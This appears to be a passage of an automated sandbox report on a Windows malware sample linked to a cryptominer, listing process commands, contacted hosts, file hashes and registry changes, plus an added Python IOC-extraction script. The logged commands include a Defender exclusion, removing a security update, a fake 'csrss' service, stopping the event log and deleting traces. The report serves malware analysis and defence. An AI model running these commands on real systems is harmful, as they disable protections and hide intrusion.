C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "csrss"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "csrss"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\SystemFiles\csrss.exe
C:\ProgramData\SystemFiles\csrss.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\3plugin0222
C:\Users\Admin\AppData\Roaming\services\3plugin0222
C:\Users\Admin\AppData\Roaming\services\3plugin0222
"C:\Users\Admin\AppData\Roaming\services\3plugin0222"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 194.87.31.18:3333 | | tcp |
| US | 8.8.8.8:53 | 18.31.87.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mezla.site | udp |
| NL | 185.209.162.106:80 | mezla.site | tcp |
| US | 8.8.8.8:53 | 106.162.209.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 31.13.26.104.in-addr.arpa | udp |
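Turning the Network table above into blockable indicators takes three steps a practitioner usually does by hand: drop the resolver traffic and the sandbox's own reverse lookups (the in-addr.arpa rows), keep the forward-resolved names as domain IOCs, and split the TCP endpoints into attacker infrastructure (apexgenz.com, solvadordali.com, mezla.site), a bare IP on a typical stratum port (194.87.31.18:3333, consistent with the XMRig verdict), and legitimate services the sample abuses (raw.githubusercontent.com for payload hosting, api.ip.sb for a public-IP lookup) that must not be blocked wholesale. The Python below is an added example, not part of the sandbox report: NETWORK_TABLE is copied from the tables above, including one row whose columns the extraction shifted, and the parser corrects for that shift. The port list and the notes on the legitimate services are my own assumptions.

```python
"""IOC extraction from the Network table of this report.

Added example, not part of the sandbox report. NETWORK_TABLE is copied from
the behavioral2 and behavioral15 Network tables; MINING_POOL_PORTS and the
LEGITIMATE_SERVICES notes are my own assumptions.
"""
from dataclasses import dataclass


@dataclass
class Conn:
    country: str
    host: str
    port: int
    domain: str
    proto: str


# Rows copied from the report; the two "| tcp | |" rows show the shifted
# columns the extraction produced when the Domain cell was empty.
NETWORK_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| NL | 194.87.31.18:3333 | tcp | |
| US | 8.8.8.8:53 | mezla.site | udp |
| NL | 185.209.162.106:80 | mezla.site | tcp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 20.231.121.79:80 | tcp | |
"""

# Ports commonly used by stratum mining pools (heuristic; the port alone is not proof).
MINING_POOL_PORTS = {3333, 4444, 5555, 7777, 14444}

# Legitimate services this sample talks to; block the URL or behaviour, not the host.
LEGITIMATE_SERVICES = {
    "raw.githubusercontent.com": "code hosting abused for payload delivery",
    "api.ip.sb": "public IP lookup, commonly used by stealers to geolocate the victim",
}


def parse_rows(table: str) -> list:
    """Parse the markdown rows, repairing rows whose Proto slid into Domain."""
    rows = []
    for line in table.splitlines()[1:]:  # skip the header row
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        if proto == "" and domain.lower() in ("tcp", "udp"):
            domain, proto = "", domain  # shifted row: no domain, proto in Domain slot
        host, _, port = dest.rpartition(":")
        rows.append(Conn(country, host, int(port), domain, proto.lower()))
    return rows


def extract_iocs(rows) -> dict:
    """Separate blockable domains/endpoints from resolver noise and abused services."""
    iocs = {"domains": set(), "endpoints": {}, "legitimate_services": {},
            "reverse_lookups_ignored": 0}
    for r in rows:
        if r.proto == "udp" and r.port == 53:  # resolver traffic: keep only the name
            if r.domain.endswith((".in-addr.arpa", ".ip6.arpa")):
                iocs["reverse_lookups_ignored"] += 1  # sandbox PTR noise
            elif r.domain not in LEGITIMATE_SERVICES:
                iocs["domains"].add(r.domain)
            continue
        ep = iocs["endpoints"].setdefault(f"{r.host}:{r.port}",
                                          {"domains": set(), "tags": set()})
        if r.domain in LEGITIMATE_SERVICES:
            iocs["legitimate_services"][r.domain] = LEGITIMATE_SERVICES[r.domain]
            ep["tags"].add("legit_service_abused")
        elif not r.domain:
            ep["tags"].add("direct_ip_no_dns")  # hard-coded C2/pool address
        else:
            iocs["domains"].add(r.domain)
        if r.domain:
            ep["domains"].add(r.domain)
        if r.port in MINING_POOL_PORTS:
            ep["tags"].add("mining_pool_port")
    return iocs


if __name__ == "__main__":
    result = extract_iocs(parse_rows(NETWORK_TABLE))
    print("block domains:", sorted(result["domains"]))
    for ep, info in result["endpoints"].items():
        print(ep, sorted(info["domains"]), sorted(info["tags"]))
    print("do not block wholesale:", result["legitimate_services"])
```

Note that 185.14.29.199 serves both apexgenz.com and solvadordali.com, so the endpoint entry accumulates both names; blocking the IP covers both, blocking one domain does not.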
Files
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5rnaqad.kvf.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | fea10d11d84919cb9a0a0752d61c0a66 |
| SHA1 | aea3c65e2b62851b2dd112597f28379b49c58a0a |
| SHA256 | 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7 |
| SHA512 | e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
C:\Users\Admin\AppData\Roaming\services\winrar.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins0222.rar
| MD5 | 192ea396deb46406bed716cde8b0fda6 |
| SHA1 | b48459b0e4f8d712150c2db39764d3658678f8ac |
| SHA256 | c56f6db940d4802fce1621bd03c3563869acc5ccf2f8fc7ef6a4cc5d17e0c04d |
| SHA512 | 359fb7a51a6524e5fab57de6b799082e3c9d0582cf0a01a5535d11c02c09803a59da47c5a1d65d6306631fa31e4eb8a03479aec5c877d7e4157f3c60ebeda6e1 |
C:\Users\Admin\AppData\Roaming\services\plugin0222
| MD5 | 17d804b82a9cae6218607478d6213aae |
| SHA1 | f5ff7adb303f6dfe07a86f0dc58ae3d2dd3c3b6f |
| SHA256 | 506c268dd0361e0bec3f2da64ba330cb56ea566fa3a1a6360519b9844ec6cddd |
| SHA512 | ce0983032550ea02b685b132ccc29d2263fbdd189a36bbd89bd9af44fdc5ce1c2446b4ea6af67ceb474880386b1a3ada33aea9ac157a029e15b55e49e39067a8 |
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
| MD5 | 5a7358d53674902c204c6fb1e21c78e4 |
| SHA1 | 1a19c63d8e832037e6b8a2ac956f5541c4efd500 |
| SHA256 | 1eaefc76658bbbfd2b00154813221e361d1fc615ce5636061d2e9a9d97c5cddb |
| SHA512 | f5d16f554634239f4149cbd514cf13dc51080e6fb80f94d07a13afd3dfa00d03cd5bde72493be120451f004aececb350ac0bcf70ae762c404da3773a42f0a3dd |
C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar
| MD5 | 82a56a666981e9e163a1aba74dc70aa8 |
| SHA1 | 709e44e71ff38d0771d839b74f270c23daa42f64 |
| SHA256 | c59448b470702a689cb0525b76d28d68b2436c4f23cac4ee18a32a7a99801eb6 |
| SHA512 | ed02644d9621256b2c0bd43eac5d46f1be3ccf741b3701ff624e0f0913bd6829d818d3006619f90fded694c01940e4fca7b1eac92cd647b87212efd4532ccbe0 |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | d4121fa27ad9f3c93d00312846a7a2cc |
| SHA1 | ce84a218b13b9084b4d30f18fcea720e078c4c9c |
| SHA256 | ffba3263bcdd2a3b008113b62dd9853d80d279350e548f50485b75925c9d5079 |
| SHA512 | 65461ca95eae4d51ee691e5a444e14f2cc18e44089c5137bf9060111c111eaeb31f74ca2b155c41d2e0f1fa3d8d4c8288a68fa47dab4fee9e80a627bd20e2ac8 |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 5a5a545484abcfd739e596c1ff8753d5 |
| SHA1 | 42543fdc4b7620ba21ba5d27fd4ab45a549eb503 |
| SHA256 | 872b4526efdb11051475cfde82c187adfa80a2496ed9835550c1421a039a203e |
| SHA512 | 7a1516dab7c58455fe687cec52c522aa111d0b454d8c7c390417e134a2e1631a9bd68c71f82c92423dce598244c71c67e7576121e7ea4c931421a3458f798374 |
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
| MD5 | 2e7e79b18cce7c94164385b314d90f53 |
| SHA1 | a7833fce28106e00572c125bc6ea992b8d150a34 |
| SHA256 | 2e6f936a73f307d230802c14a6aafa06c8e53dcec51ae032acc50cb58e245570 |
| SHA512 | dfa49cfb4d64dfc5d20d153c15c696415eccf5da08a4df48f11eeb10bfc29dd3157875c5eca7e6e620113a9191344907828f9c56d8f6018686064ff8b2935c09 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1382baf175d45c3403f7876af44f4e5d |
| SHA1 | 22ac418cfb7969eb2594103b7b9453ba47d5442f |
| SHA256 | dbd14887459c04a3cfc9794da8ab8e6ccbf6a9ed0762055b15d8e55883308374 |
| SHA512 | 63c7aa001a6b005f6eb04c8484dc7586bf8f7e975ae9c7e9a460c220ae1ffefbb14531067f61e5a5a51f20d4b967c399782c28d70538a12d7aa7ac72fa444b24 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | c2d06c11dd1f1a8b1dedc1a311ca8cdc |
| SHA1 | 75c07243f9cb80a9c7aed2865f9c5192cc920e7e |
| SHA256 | 91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586 |
| SHA512 | db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 7575c74a6cb2582fe872ec4e5c34d9ae |
| SHA1 | 8616d5c5687df7133cb3320d131ab82a25197ca7 |
| SHA256 | 5cfc757280526df2130740c4fc1722623bb6a51866af1b4f4fba8acaf2b23064 |
| SHA512 | 8afc0d7c08397a0efc03b313fd9a4986f29c3415ccd640e582fa60a0d3696539243e8d3859cd1b06aea632646b5eb31ffff5cc73ca3df1ac178f44397607b860 |
C:\Users\Admin\AppData\Roaming\services\WinRAR.exe
| MD5 | ed8f7b42b7277a00a8f6eb192dc0bd77 |
| SHA1 | 34ff362e6b95852d84580a3430f84da939671c59 |
| SHA256 | 4af7ef4064e4543d12f19d0edc2a7966e3f91412dff582333ecc0d8e599e9a30 |
| SHA512 | 15e66093b010741788c24c4a14c824a5ef92a3de9618e7c9eae002ce90cc6c89ff35228e4b202cb2f538b8fc57688e40eaee07395608f32a291753fc09396c2f |
C:\Users\Admin\AppData\Roaming\services\03plugins0222.rar
| MD5 | 4a3baa2e2630e287a5c0e804c0564ca0 |
| SHA1 | c00ae566d6c2dc3f6e20566955d210a16807e028 |
| SHA256 | c039a58e89ffc961c978c61cd8746b95c481251381b62acaec252f26e184e919 |
| SHA512 | 606e9507f80241b932c4f3d4c8fc0207d3e36557d5b1e2837436dc9d6f5b58e7204b18935a091b8a5eff0ea75ef47d14f045cad2a120e43c07de35019849cd16 |
C:\Users\Admin\AppData\Roaming\services\3plugin0222
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\services\3plugin0222
| MD5 | 028aef2aedb49bb9148e23b3b7b03d37 |
| SHA1 | 94efee9913eed144e9c1c9727cf82543f65c0ed9 |
| SHA256 | bd3ad16cfba1acfcca16be462fe11c0ad79dda99dac169c160d07cc47b3533c2 |
| SHA512 | a02ebba3a92fcd7869b87e71f3d5e6238fc738eada46f67e8320d7fad7119f676158b67f18bd3272eb1caedbf521f260bd59b9f5517fb257b50d1168d708ba57 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3plugin0222.log
| MD5 | 807cb75397a3a9fc38e9fb5f8566eb2d |
| SHA1 | 367e151fab5a5a80e60202d287ae522ea53e2563 |
| SHA256 | 3e5056b73303b361e6b7b52f5edb2ed1a7e9dc2c762bb91d18046f42bc2ffcf3 |
| SHA512 | 49efef0401ba0e0dc0b30bdff5d414da5494e4194c6269da2cb40b1ab7dc53e7858d29d2b9982bf3ee60ebc9638b5ed2b5ddcbb536bcc57729e79fc81f59f13d |
C:\Users\Admin\AppData\Roaming\services\3plugin0222
| MD5 | ed890fea49ea376d0464e8f04ee58811 |
| SHA1 | f3134c8c4b2549e38362d1372f6f6b5a2372aee0 |
| SHA256 | 1e328ea5223b16dec5b109c8b412e71d891e12d0de423b72f6b473d858c0b362 |
| SHA512 | 1b5b83412f8ea62e502129abb3664608fd4688286ff8fc5d7b0eab4cee0c5457793ddd5eebf29978cce20bac86e79351df6480336b6913bdc02a4ebc30e48dc4 |
C:\Users\Admin\AppData\Roaming\services\WGET-H~1
| MD5 | 990d670f7d0d9addc18642f106831b36 |
| SHA1 | b3b3f72b362c153a8fa060b6e26c0972682e3582 |
| SHA256 | dbd84f95c50bcad3bdd257368e723deee49c428a4434c1a6ffb2852f12611253 |
| SHA512 | 25bde6d8817126077b27b11042b42424d23ca9168e127812c31f2f7aeda93e9e47c971fd0d4b9e36cbee405f3e4085ae14e362deae76148fe69d9c5bb0f7206a |
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240214-en
Max time kernel
117s
Max time network
131s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x410
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| NL | 52.111.243.30:443 | | tcp |
| US | 8.8.8.8:53 | 200.201.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.178.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1hzz0dj.dw2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
116s
Max time network
149s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
